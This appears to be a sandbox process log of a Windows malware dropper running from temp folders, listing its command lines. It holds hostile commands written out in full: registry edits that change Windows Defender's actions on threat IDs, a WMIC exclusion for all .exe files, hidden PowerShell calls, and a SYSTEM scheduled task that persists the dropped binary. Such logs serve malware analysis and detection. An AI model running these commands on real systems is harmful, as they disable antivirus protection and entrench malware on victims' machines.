"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1928,i,5793724371325549522,7801053063361162104,262144 --variations-seed-version --mojo-platform-channel-handle=2904 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2284,i,5793724371325549522,7801053063361162104,262144 --variations-seed-version --mojo-platform-channel-handle=3008 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4076,i,5793724371325549522,7801053063361162104,262144 --variations-seed-version --mojo-platform-channel-handle=4132 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4076,i,5793724371325549522,7801053063361162104,262144 --variations-seed-version --mojo-platform-channel-handle=4132 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2300
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2384
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4584 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe
C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe /did=757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2704 -ip 2704
C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe
C:\Users\Admin\AppData\Local\Temp\LradqfZU\YAEcKI.exe -6wqfqov40w8wuojd26si1tc58hxkkp5v
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2300
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4600 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2384
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2084
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Program Files\WProxy\WinProxy\WinProxy.exe
"C:\Program Files\WProxy\WinProxy\WinProxy.exe"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Program Files\Geonode\Repocket\Repocket.exe
"C:\Program Files\Geonode\Repocket\Repocket.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2704 -ip 2704
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405250106361\assistant\Assistant_110.0.5130.23_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405250106361\assistant\Assistant_110.0.5130.23_Setup.exe_sfx.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1972
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405250106361\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405250106361\assistant\assistant_installer.exe" --version
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2704 -ip 2704
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405250106361\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202405250106361\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=110.0.5130.23 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x4030e8,0x4030f4,0x403100
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2392
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1732
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=1536 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1780
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1800
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=736 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2704 -ip 2704
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1984
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2704 -ip 2704
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1760
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2704 -ip 2704
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4528 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1800
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bsuAwLimisXNmJFuDt" /SC once /ST 01:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe\" gs /VFAdidgAgG 757674 /S" /V1 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2704 -ip 2704
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bsuAwLimisXNmJFuDt"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 2372
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bsuAwLimisXNmJFuDt
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bsuAwLimisXNmJFuDt
C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe
C:\Users\Admin\AppData\Local\Temp\GPgYdOtD\BieWDBrGFmv8wDtK84.exe gs /VFAdidgAgG 757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1964
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5524 --field-trial-handle=1876,i,10431594330799616555,10207093627331151275,131072 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
